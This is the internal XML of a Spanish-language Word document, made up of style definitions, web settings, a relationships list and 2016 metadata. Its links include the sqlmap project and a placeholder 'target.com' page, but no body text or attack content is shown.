      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaconvietas2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="25"/>
      </w:numPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Continuarlista2">
    <w:name w:val="List Continue 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="566"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sangradetextonormal">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="SangradetextonormalCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="283"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SangradetextonormalCar">
    <w:name w:val="Sangría de texto normal Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Sangradetextonormal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="007C1EFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sangranormal">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="708"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Remiteabreviado">
    <w:name w:val="Remite abreviado"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textoindependienteprimerasangra">
    <w:name w:val="Body Text First Indent"/>
    <w:basedOn w:val="Textoindependiente"/>
    <w:link w:val="TextoindependienteprimerasangraCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:ind w:firstLine="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextoindependienteprimerasangraCar">
    <w:name w:val="Texto independiente primera sangría Car"/>
    <w:basedOn w:val="TextoindependienteCar"/>
    <w:link w:val="Textoindependienteprimerasangra"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="007C1EFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textoindependienteprimerasangra2">
    <w:name w:val="Body Text First Indent 2"/>
    <w:basedOn w:val="Sangradetextonormal"/>
    <w:link w:val="Textoindependienteprimerasangra2Car"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>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C1EFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cierre">
    <w:name w:val="Closing"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CierreCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="4252"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CierreCar">
    <w:name w:val="Cierre Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Cierre"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="007C1EFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Firma">
    <w:name w:val="Signature"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FirmaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="4252"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FirmaCar">
    <w:name w:val="Firma Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Firma"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="007C1EFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Firmapuesto">
    <w:name w:val="Firma puesto"/>
    <w:basedOn w:val="Firma"/>
    <w:rsid w:val="007C1EFC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Firmaorganizacin">
    <w:name w:val="Firma organización"/>
    <w:basedOn w:val="Firma"/>
    <w:rsid w:val="007C1EFC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00277259"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:color="000000" w:themeColor="text1"/>
      <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tabladelista3-nfasis1">
    <w:name w:val="List Table 3 Accent 1"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="48"/>
    <w:rsid w:val="007E1287"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="3494BA" w:themeColor="accent1"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="3494BA" w:themeColor="accent1"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="3494BA" w:themeColor="accent1"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="3494BA" w:themeColor="accent1"/>
      </w:tblBorders>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table" w:styleId="Tabladelista7concolores-nfasis1">
    <w:name w:val="List Table 7 Colorful Accent 1"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="52"/>
    <w:rsid w:val="007E1287"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="276E8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94B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94B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94B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94BA" w:themeColor="accent1"/>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4-nfasis1">
    <w:name w:val="Grid Table 4 Accent 1"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="007E1287"/>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concuadrcula">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="009D0BAC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="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4">
    <w:name w:val="Grid Table 2 Accent 4"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="47"/>
    <w:rsid w:val="00A64052"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="2" w:space="0" w:color="AFB9BB" w:themeColor="accent4" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AFB9BB" w:themeColor="accent4" w:themeTint="99"/>
        <w:insideH w:val="single" w:sz="2" w:space="0" w:color="AFB9BB" w:themeColor="accent4" w:themeTint="99"/>
        <w:insideV w:val="single" w:sz="2" w:space="0" w:color="AFB9BB" w:themeColor="accent4" w:themeTint="99"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="AFB9BB" w:themeColor="accent4" w:themeTint="99"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="2" w:space="0" w:color="AFB9B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character" w:customStyle="1" w:styleId="mw-headline">
    <w:name w:val="mw-headline"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00245646"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection">
    <w:name w:val="mw-editsection"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00245646"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection-bracket">
    <w:name w:val="mw-editsection-bracket"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00245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368599">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="949313104">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="954091949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1234006227">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1839808341">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="579605184">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="141624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76972">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="25839714">
          <w:marLeft w:val="336"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="120"/>
          <w:marBottom w:val="312"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="57366798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emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><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emf"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.target.com/noticias.php?id=1" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.emf"/><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emf"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.emf"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.emf"/><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www.laboratorioibc.com" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpe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image" Target="media/image53.emf"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.emf"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.emf"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.emf"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.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yperlink" Target="http://www.labzuna.com.bo" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpe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67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.emf"/><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emf"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.emf"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.emf"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.emf"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sqlmapproject/sqlmap" TargetMode="External"/><Relationship Id="rId88"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hyperlink" Target="http://www.biovirtual.com.bo" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.emf"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><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emf"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.emf"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.emf"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><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hyperlink" Target="http://www.biovirtual.com.bo" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.emf"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.emf"/><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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.emf"/><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emf"/><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emf"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.emf"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.emf"/></Relationships>
</file>

<file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Tema de Office">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16810-B731-45E3-8D34-0AC0F2D0C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74</Pages>
  <Words>8003</Words>
  <Characters>44017</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Lisbeth</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lisbeth</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-23T15:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-23T16:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>